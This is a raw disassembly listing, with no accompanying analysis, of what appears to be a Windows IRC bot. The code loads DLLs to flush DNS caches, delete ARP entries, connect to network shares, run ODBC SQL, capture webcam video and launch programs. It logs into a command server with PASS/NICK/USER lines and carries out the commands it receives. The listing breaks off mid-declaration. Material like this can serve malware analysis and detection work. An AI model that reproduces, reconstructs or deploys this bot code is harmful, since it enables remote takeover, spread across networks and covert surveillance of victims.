cmp dword_444114, ebx
jnz short loc_401D50
jmp short loc_401D46
; ---------------------------------------------------------------------------
loc_401D3B: ; CODE XREF: sub_4012D6+969�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442A0, eax
loc_401D46: ; CODE XREF: sub_4012D6+A11�j
; sub_4012D6+A19�j ...
mov dword_44429C, 1
loc_401D50: ; CODE XREF: sub_4012D6+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401D85
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4441F0, eax
call esi ; GetProcAddress
cmp dword_4441F0, ebx
mov dword_44416C, eax
jz short loc_401D90
cmp eax, ebx
jnz short loc_401D9A
jmp short loc_401D90
; ---------------------------------------------------------------------------
loc_401D85: ; CODE XREF: sub_4012D6+A85�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442A8, eax
loc_401D90: ; CODE XREF: sub_4012D6+AA7�j
; sub_4012D6+AAD�j
mov dword_4442A4, 1
loc_401D9A: ; CODE XREF: sub_4012D6+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401DCF
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_44410C, eax
call esi ; GetProcAddress
cmp dword_44410C, ebx
mov dword_444174, eax
jz short loc_401DDA
cmp eax, ebx
jnz short loc_401DE4
jmp short loc_401DDA
; ---------------------------------------------------------------------------
loc_401DCF: ; CODE XREF: sub_4012D6+ACF�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442B0, eax
loc_401DDA: ; CODE XREF: sub_4012D6+AF1�j
; sub_4012D6+AF7�j
mov dword_4442AC, 1
loc_401DE4: ; CODE XREF: sub_4012D6+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401E43
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4441AC, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_444240, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4440D8, eax
call esi ; GetProcAddress
cmp dword_4441AC, ebx
mov dword_444090, eax
jz short loc_401E4E
cmp dword_444240, ebx
jz short loc_401E4E
cmp dword_4440D8, ebx
jz short loc_401E4E
cmp eax, ebx
jnz short loc_401E58
jmp short loc_401E4E
; ---------------------------------------------------------------------------
loc_401E43: ; CODE XREF: sub_4012D6+B19�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442B8, eax
loc_401E4E: ; CODE XREF: sub_4012D6+B55�j
; sub_4012D6+B5D�j ...
mov dword_4442B4, 1
loc_401E58: ; CODE XREF: sub_4012D6+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401E8D
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_444214, eax
call esi ; GetProcAddress
cmp dword_444214, ebx
mov dword_4440D0, eax
jz short loc_401E98
cmp eax, ebx
jnz short loc_401EA2
jmp short loc_401E98
; ---------------------------------------------------------------------------
loc_401E8D: ; CODE XREF: sub_4012D6+B8D�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442C0, eax
loc_401E98: ; CODE XREF: sub_4012D6+BAF�j
; sub_4012D6+BB5�j
mov dword_4442BC, 1
loc_401EA2: ; CODE XREF: sub_4012D6+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401F2B
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4441F8, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4440B4, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_444210, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_444128, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4441BC, eax
call esi ; GetProcAddress
cmp dword_4441F8, ebx
mov dword_4440C4, eax
jz short loc_401F36
cmp dword_4440B4, ebx
jz short loc_401F36
cmp dword_444210, ebx
jz short loc_401F36
cmp dword_444128, ebx
jz short loc_401F36
cmp dword_4441BC, ebx
jz short loc_401F36
cmp eax, ebx
jnz short loc_401F40
jmp short loc_401F36
; ---------------------------------------------------------------------------
loc_401F2B: ; CODE XREF: sub_4012D6+BD7�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442C8, eax
loc_401F36: ; CODE XREF: sub_4012D6+C2D�j
; sub_4012D6+C35�j ...
mov dword_4442C4, 1
loc_401F40: ; CODE XREF: sub_4012D6+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401F75
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_444138, eax
call esi ; GetProcAddress
cmp dword_444138, ebx
mov dword_44419C, eax
jz short loc_401F80
cmp eax, ebx
jnz short loc_401F8A
jmp short loc_401F80
; ---------------------------------------------------------------------------
loc_401F75: ; CODE XREF: sub_4012D6+C75�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov dword_4442D0, eax
loc_401F80: ; CODE XREF: sub_4012D6+C97�j
; sub_4012D6+C9D�j
mov dword_4442CC, 1
loc_401F8A: ; CODE XREF: sub_4012D6+C9B�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_4012D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401F92(int,char *Str,int,int)
sub_401F92 proc near ; CODE XREF: sub_40274D+2349�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+Str]
push esi
xor esi, esi
cmp dword_444264, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_401FDA
push dword_444268
lea eax, [ebp+Dest]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_401FDA: ; CODE XREF: sub_401F92+1A�j
cmp dword_44426C, esi
jz short loc_40200E
push dword_444270
lea eax, [ebp+Dest]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_40200E: ; CODE XREF: sub_401F92+4E�j
cmp dword_444274, esi
jz short loc_402042
push dword_444278
lea eax, [ebp+Dest]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_402042: ; CODE XREF: sub_401F92+82�j
cmp dword_44427C, esi
jz short loc_402076
push dword_444280
lea eax, [ebp+Dest]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_402076: ; CODE XREF: sub_401F92+B6�j
cmp dword_444284, esi
jz short loc_4020AA
push dword_444288
lea eax, [ebp+Dest]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_4020AA: ; CODE XREF: sub_401F92+EA�j
cmp dword_44428C, esi
jz short loc_4020DE
push dword_444290
lea eax, [ebp+Dest]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_4020DE: ; CODE XREF: sub_401F92+11E�j
cmp dword_444294, esi
jz short loc_402112
push dword_444298
lea eax, [ebp+Dest]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_402112: ; CODE XREF: sub_401F92+152�j
cmp dword_44429C, esi
jz short loc_402146
push dword_4442A0
lea eax, [ebp+Dest]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_402146: ; CODE XREF: sub_401F92+186�j
cmp dword_4442A4, esi
jz short loc_40217A
push dword_4442A8
lea eax, [ebp+Dest]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_40217A: ; CODE XREF: sub_401F92+1BA�j
cmp dword_4442AC, esi
jz short loc_4021AE
push dword_4442B0
lea eax, [ebp+Dest]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_4021AE: ; CODE XREF: sub_401F92+1EE�j
cmp dword_4442B4, esi
jz short loc_4021E2
push dword_4442B8
lea eax, [ebp+Dest]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_4021E2: ; CODE XREF: sub_401F92+222�j
cmp dword_4442BC, esi
jz short loc_402216
push dword_4442C0
lea eax, [ebp+Dest]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_402216: ; CODE XREF: sub_401F92+256�j
cmp dword_4442C4, esi
jz short loc_40224A
push dword_4442C8
lea eax, [ebp+Dest]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_40224A: ; CODE XREF: sub_401F92+28A�j
cmp dword_4442CC, esi
jz short loc_40227E
push dword_4442D0
lea eax, [ebp+Dest]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 20h
loc_40227E: ; CODE XREF: sub_401F92+2BE�j
lea eax, [ebp+Dest]
push offset asc_42BF4C ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_4022AB
push esi ; int
push edi ; int
lea eax, [ebp+Dest]
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_4022AB: ; CODE XREF: sub_401F92+302�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_401F92 endp
; =============== S U B R O U T I N E =======================================
sub_4022BD proc near ; CODE XREF: sub_4025EF+136�p
; sub_40274D+59AF�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_4022E5
push [esp+arg_0]
call dword_444168 ; gethostbyname
test eax, eax
jnz short loc_4022DE
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_4022DE: ; CODE XREF: sub_4022BD+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_4022E5: ; CODE XREF: sub_4022BD+D�j
retn
sub_4022BD endp
; =============== S U B R O U T I N E =======================================
sub_4022E6 proc near ; CODE XREF: sub_4025EF+A2�p
mov ecx, dword_4441F0
xor eax, eax
test ecx, ecx
jz short locret_4022F4
jmp ecx
; ---------------------------------------------------------------------------
locret_4022F4: ; CODE XREF: sub_4022E6+A�j
retn
sub_4022E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_4022F5 proc near ; CODE XREF: sub_40274D:loc_4049BF�p
Dest = byte ptr -88h
Size = dword ptr -8
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 88h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
lea eax, [ebp+78h+Size]
xor edi, edi
push eax
push edi
xor esi, esi
mov [ebp+78h+Size], edi
mov [ebp+78h+var_4], ebx
call dword_44410C ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz short loc_40237B
sub ecx, 32h
jz loc_4023C2
sub ecx, 48h
jz short loc_402350
sub ecx, 6Eh
jz short loc_402349
loc_402335: ; CODE XREF: sub_4022F5+84�j
push eax
lea eax, [ebp+78h+Dest]
push offset asc_42C160 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4023A3
; ---------------------------------------------------------------------------
loc_402349: ; CODE XREF: sub_4022F5+3E�j
push offset unk_42C13C
jmp short loc_402398
; ---------------------------------------------------------------------------
loc_402350: ; CODE XREF: sub_4022F5+39�j
push [ebp+78h+Size] ; Size
call _malloc
push [ebp+78h+Size] ; Size
mov esi, eax
push edi ; Val
push esi ; Dst
call _memset
add esp, 10h
cmp esi, edi
jz short loc_402393
push ebx
lea eax, [ebp+78h+Size]
push eax
push esi
call dword_44410C ; GetIpNetTable
cmp eax, edi
jnz short loc_402335
loc_40237B: ; CODE XREF: sub_4022F5+2B�j
cmp [esi], edi
jbe short loc_4023B0
lea ebx, [esi+4]
loc_402382: ; CODE XREF: sub_4022F5+9A�j
push ebx
call dword_444174 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_402382
jmp short loc_4023B0
; ---------------------------------------------------------------------------
loc_402393: ; CODE XREF: sub_4022F5+74�j
push offset asc_42C10C ; "-"
loc_402398: ; CODE XREF: sub_4022F5+59�j
; sub_4022F5+D2�j
lea eax, [ebp+78h+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4023A3: ; CODE XREF: sub_4022F5+52�j
lea eax, [ebp+78h+Dest]
push eax
mov [ebp+78h+var_4], edi
call sub_417D70
pop ecx
loc_4023B0: ; CODE XREF: sub_4022F5+88�j
; sub_4022F5+9C�j
push esi ; Memory
call _free
mov eax, [ebp+78h+var_4]
pop ecx
pop edi
pop esi
pop ebx
add ebp, 78h
leave
retn
; ---------------------------------------------------------------------------
loc_4023C2: ; CODE XREF: sub_4022F5+30�j
push offset unk_42C0DC
jmp short loc_402398
sub_4022F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023C9 proc near ; CODE XREF: sub_40274D+2037�p
; sub_40274D+2162�p ...
Dst = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
push eax ; Size
mov [ebp+var_4], eax
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_444068 ; getsockname
movzx eax, [ebp+var_D]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
mov esi, offset Dest
push esi ; Dest
call _sprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_4023C9 endp
; =============== S U B R O U T I N E =======================================
sub_402422 proc near ; CODE XREF: sub_415825+29F�p
; sub_415825+2D9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
xor edx, edx
cmp ecx, 1
push esi
jle short loc_40244D
lea eax, [ecx-2]
shr eax, 1
inc eax
mov esi, eax
neg esi
lea ecx, [ecx+esi*2]
mov esi, [esp+4+arg_0]
push edi
loc_402440: ; CODE XREF: sub_402422+26�j
movzx edi, word ptr [esi]
add edx, edi
inc esi
inc esi
dec eax
jnz short loc_402440
pop edi
jmp short loc_402451
; ---------------------------------------------------------------------------
loc_40244D: ; CODE XREF: sub_402422+A�j
mov esi, [esp+4+arg_0]
loc_402451: ; CODE XREF: sub_402422+29�j
test ecx, ecx
jz short loc_40245A
movzx eax, byte ptr [esi]
add edx, eax
loc_40245A: ; CODE XREF: sub_402422+31�j
mov ecx, edx
shr ecx, 10h
and edx, 0FFFFh
add ecx, edx
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
pop esi
retn
sub_402422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_402472 proc near ; CODE XREF: sub_4025EF+E0�p
Dst = byte ptr -1A90h
var_A90 = dword ptr -0A90h
Str1 = byte ptr -2C0h
var_140 = dword ptr -140h
Str = byte ptr -0A0h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov eax, 1A90h
lea ebp, [esp-58h]
call __alloca_probe
push esi
xor esi, esi
push 3
mov [ebp+58h+var_8], esi
lea eax, [ebp+58h+Str1]
pop ecx
loc_402490: ; CODE XREF: sub_402472+27�j
mov byte ptr [eax], 0
add eax, 80h
dec ecx
jnz short loc_402490
cmp byte_4D1FD8, 0
jz short loc_4024B9
push offset byte_4D1FD8 ; Args
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0] ; int
call sub_4011F5
add esp, 0Ch
loc_4024B9: ; CODE XREF: sub_402472+30�j
push [ebp+58h+Source]
lea eax, [ebp+58h+Dest]
push esi ; Str1
push esi ; int
push 2 ; int
push eax ; Dest
call sub_40AB83
add esp, 10h
push eax
push [ebp+58h+Source]
lea eax, [ebp+58h+Str]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+58h+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+58h+Str]
push eax
push [ebp+58h+arg_0]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40251A
push [ebp+58h+arg_0]
call dword_444218 ; closesocket
push 1388h
call ds:dword_42B014 ; Sleep
xor eax, eax
jmp loc_4025E9
; ---------------------------------------------------------------------------
loc_40251A: ; CODE XREF: sub_402472+8B�j
push ebx
push edi
mov ebx, 1000h
jmp loc_4025B0
; ---------------------------------------------------------------------------
loc_402526: ; CODE XREF: sub_402472+163�j
lea eax, [ebp+58h+var_A90]
push eax ; int
lea eax, [ebp+58h+Dst]
push eax ; Str
call sub_41AC0E
cmp eax, esi
pop ecx
pop ecx
mov [ebp+58h+var_C], eax
mov [ebp+58h+var_4], esi
jle short loc_4025B0
lea edi, [ebp+58h+var_A90]
loc_40254B: ; CODE XREF: sub_402472+13A�j
xor esi, esi
inc esi
loc_40254E: ; CODE XREF: sub_402472+11D�j
push [ebp+58h+arg_1C] ; int
lea eax, [ebp+58h+var_8]
push esi ; int
push eax ; int
lea eax, [ebp+58h+var_140]
push eax ; int
lea eax, [ebp+58h+Str1]
push eax ; Str1
push [ebp+58h+arg_18] ; int
push [ebp+58h+Source] ; Source
push [ebp+58h+arg_8] ; int
push [ebp+58h+arg_4] ; int
push [ebp+58h+arg_0] ; int
push dword ptr [edi] ; int
call sub_40274D
add esp, 2Ch
dec eax
mov esi, eax
test esi, esi
jle short loc_402591
push 7D0h
call ds:dword_42B014 ; Sleep
jmp short loc_40254E
; ---------------------------------------------------------------------------
loc_402591: ; CODE XREF: sub_402472+110�j
cmp esi, 0FFFFFFFDh
jz short loc_4025E4
cmp esi, 0FFFFFFFEh
jz short loc_4025DF
cmp esi, 0FFFFFFFFh
jz short loc_4025DB
inc [ebp+58h+var_4]
mov eax, [ebp+58h+var_4]
add edi, 4
cmp eax, [ebp+58h+var_C]
jl short loc_40254B
xor esi, esi
loc_4025B0: ; CODE XREF: sub_402472+AF�j
; sub_402472+D1�j
push ebx ; Size
lea eax, [ebp+58h+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push esi
push ebx
lea eax, [ebp+58h+Dst]
push eax
push [ebp+58h+arg_0]
call dword_444064 ; recv
test eax, eax
jg loc_402526
loc_4025DB: ; CODE XREF: sub_402472+12C�j
xor eax, eax
jmp short loc_4025E7
; ---------------------------------------------------------------------------
loc_4025DF: ; CODE XREF: sub_402472+127�j
xor eax, eax
inc eax
jmp short loc_4025E7
; ---------------------------------------------------------------------------
loc_4025E4: ; CODE XREF: sub_402472+122�j
push 2
pop eax
loc_4025E7: ; CODE XREF: sub_402472+16B�j
; sub_402472+170�j
pop edi
pop ebx
loc_4025E9: ; CODE XREF: sub_402472+A3�j
pop esi
add ebp, 58h
leave
retn
sub_402472 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4025EF proc near ; CODE XREF: WinMain(x,x,x,x)+4D0�p
; DATA XREF: sub_40274D+6340�o
var_190 = dword ptr -190h
Args = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dst = byte ptr -2Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 190h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_190]
rep movsd
mov dword ptr [eax+160h], 1
jmp loc_4026FB
; ---------------------------------------------------------------------------
loc_40261B: ; CODE XREF: sub_4025EF+141�j
push 1Ch ; Size
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
call _memset
push 0 ; Str1
push dword_43C098 ; int
lea eax, [ebp+74h+Dst]
push dword_43C094 ; int
push eax ; Dest
call sub_40AB83
mov edi, eax
mov eax, [ebp+74h+var_34]
imul eax, 234h
push 1Bh ; Count
add eax, offset byte_444500
push edi ; Source
push eax ; Dest
call _strncpy
add esp, 28h
push 6
push 1
push 2
call dword_444100 ; socket
mov esi, eax
mov eax, [ebp+74h+var_34]
imul eax, 234h
mov dword_4444F4[eax], esi
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40269D
push esi
call dword_444218 ; closesocket
call sub_4022E6
push 7D0h
jmp short loc_4026EE
; ---------------------------------------------------------------------------
loc_40269D: ; CODE XREF: sub_4025EF+99�j
lea eax, [ebp+74h+Args]
push eax ; Args
push offset asc_42C830 ; "-"
call sub_417DE4
push [ebp+74h+var_38]
lea eax, [ebp+74h+Args]
push eax
lea eax, [ebp+74h+var_8C]
push eax
push [ebp+74h+var_190]
lea eax, [ebp+74h+var_CC]
push edi
push eax
lea eax, [ebp+74h+var_10C]
push eax
push esi
call sub_402472
add esp, 28h
push esi
mov edi, eax
call dword_444218 ; closesocket
test edi, edi
jz short loc_4026FB
cmp edi, 1
jnz short loc_4026F6
push 0DBBA0h
loc_4026EE: ; CODE XREF: sub_4025EF+AC�j
call ds:dword_42B014 ; Sleep
jmp short loc_4026FB
; ---------------------------------------------------------------------------
loc_4026F6: ; CODE XREF: sub_4025EF+F8�j
cmp edi, 2
jz short loc_402738
loc_4026FB: ; CODE XREF: sub_4025EF+27�j
; sub_4025EF+F3�j ...
push 10h ; Size
lea eax, [ebp+74h+var_10]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_3C]
mov [ebp+74h+var_10], 2
call dword_444260 ; htons
mov [ebp+74h+var_E], ax
lea eax, [ebp+74h+Args]
push eax
call sub_4022BD
test eax, eax
pop ecx
mov [ebp+74h+var_C], eax
jnz loc_40261B
jmp short loc_402744
; ---------------------------------------------------------------------------
loc_402738: ; CODE XREF: sub_4025EF+10A�j
push [ebp+74h+var_34]
call sub_40B149
pop ecx
push 2
pop eax
loc_402744: ; CODE XREF: sub_4025EF+147�j
pop edi
pop esi
add ebp, 74h
leave
retn 4
sub_4025EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=4Ch
; int __cdecl sub_40274D(int,int,int,int,char *Source,int,char *Str1,int,int,int,int)
sub_40274D proc near ; CODE XREF: sub_402472+103�p
var_5DEC = dword ptr -5DECh
var_5D90 = dword ptr -5D90h
var_5990 = byte ptr -5990h
var_5590 = byte ptr -5590h
var_5400 = byte ptr -5400h
var_5200 = byte ptr -5200h
var_50FC = byte ptr -50FCh
FullPath = byte ptr -4FFCh
var_4EF8 = byte ptr -4EF8h
var_4DF8 = byte ptr -4DF8h
var_4CF8 = byte ptr -4CF8h
var_4BF8 = byte ptr -4BF8h
Str = byte ptr -4AF8h
var_48F8 = byte ptr -48F8h
var_47F4 = byte ptr -47F4h
var_46F4 = byte ptr -46F4h
var_45F4 = dword ptr -45F4h
var_4590 = byte ptr -4590h
var_4390 = byte ptr -4390h
var_4290 = byte ptr -4290h
var_4190 = byte ptr -4190h
var_4090 = byte ptr -4090h
var_3F90 = dword ptr -3F90h
var_3F8C = dword ptr -3F8Ch
var_3F88 = byte ptr -3F88h
var_3F08 = byte ptr -3F08h
var_3E88 = byte ptr -3E88h
var_3E08 = byte ptr -3E08h
var_3D88 = byte ptr -3D88h
var_3D08 = dword ptr -3D08h
var_3D04 = dword ptr -3D04h
var_3D00 = dword ptr -3D00h
var_3CFC = dword ptr -3CFCh
var_3CF8 = byte ptr -3CF8h
var_3C78 = byte ptr -3C78h
var_3B74 = byte ptr -3B74h
var_3A70 = dword ptr -3A70h
var_3A6C = dword ptr -3A6Ch
var_3A68 = dword ptr -3A68h
var_3A64 = dword ptr -3A64h
var_3A60 = dword ptr -3A60h
var_3A5C = byte ptr -3A5Ch
var_37D5 = byte ptr -37D5h
var_37D4 = byte ptr -37D4h
var_36D0 = dword ptr -36D0h
var_36C8 = dword ptr -36C8h
var_36C4 = dword ptr -36C4h
var_36C0 = dword ptr -36C0h
var_36BC = dword ptr -36BCh
var_36B4 = dword ptr -36B4h
var_36B0 = dword ptr -36B0h
var_36AC = byte ptr -36ACh
var_362C = byte ptr -362Ch
var_35AC = byte ptr -35ACh
var_352C = byte ptr -352Ch
var_34AC = dword ptr -34ACh
var_34A8 = dword ptr -34A8h
var_34A4 = dword ptr -34A4h
var_34A0 = dword ptr -34A0h
var_349C = dword ptr -349Ch
var_3498 = byte ptr -3498h
var_3418 = byte ptr -3418h
var_3398 = byte ptr -3398h
var_3318 = byte ptr -3318h
var_3298 = dword ptr -3298h
var_3294 = dword ptr -3294h
var_3290 = dword ptr -3290h
var_328C = dword ptr -328Ch
var_3288 = dword ptr -3288h
var_3284 = byte ptr -3284h
var_3204 = byte ptr -3204h
var_3184 = byte ptr -3184h
var_3104 = byte ptr -3104h
var_3084 = dword ptr -3084h
var_3080 = dword ptr -3080h
var_307C = dword ptr -307Ch
var_3078 = dword ptr -3078h
var_3074 = dword ptr -3074h
var_3070 = byte ptr -3070h
var_2FF0 = byte ptr -2FF0h
var_2F70 = byte ptr -2F70h
var_2EF0 = byte ptr -2EF0h
var_2E70 = dword ptr -2E70h
var_2E6C = dword ptr -2E6Ch
var_2E68 = dword ptr -2E68h
var_2E64 = dword ptr -2E64h
var_2E60 = byte ptr -2E60h
var_2D5C = dword ptr -2D5Ch
var_2D58 = byte ptr -2D58h
var_2C54 = byte ptr -2C54h
var_2B50 = dword ptr -2B50h
var_2B4C = dword ptr -2B4Ch
var_2B48 = dword ptr -2B48h
